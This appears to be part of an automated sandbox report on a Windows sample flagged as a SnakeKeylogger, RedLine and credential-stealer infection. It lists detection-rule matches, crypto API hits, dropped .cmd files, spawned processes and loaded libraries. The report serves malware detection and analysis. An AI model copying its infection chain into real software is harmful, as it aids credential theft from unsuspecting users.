Source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ja811MqV4h.exe.210c6e48.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000001.1321974377.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3812458119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/4@3/3

Source: C:\Users\user\Desktop\ja811MqV4h.exe

Code function: 0_2_029C793C GetDiskFreeSpaceA,

0_2_029C793C

Source: C:\Users\user\Links\daphpvwO.pif

Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,

5_2_004019F0

Source: C:\Users\user\Links\daphpvwO.pif

5_2_004019F0

Source: C:\Users\user\Desktop\ja811MqV4h.exe

File created: C:\Users\All Users\6556.cmd

Source: C:\Users\user\Links\daphpvwO.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8728:120:WilError_03

Source: C:\Users\user\Links\daphpvwO.pif	Command line argument: 08A	5_2_00413780
Source: C:\Users\user\Links\daphpvwO.pif	Command line argument: 08A	5_2_00413780
Source: C:\Users\user\Links\daphpvwO.pif	Command line argument: 08A	5_1_00413780

Source: C:\Users\user\Desktop\ja811MqV4h.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ja811MqV4h.exe "C:\Users\user\Desktop\ja811MqV4h.exe"
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6556.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\33809.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Process created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pif
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6556.cmd""	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\33809.cmd""	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Process created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pif	Jump to behavior

Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Section loaded: windows.storage.dll	Jump to behavior
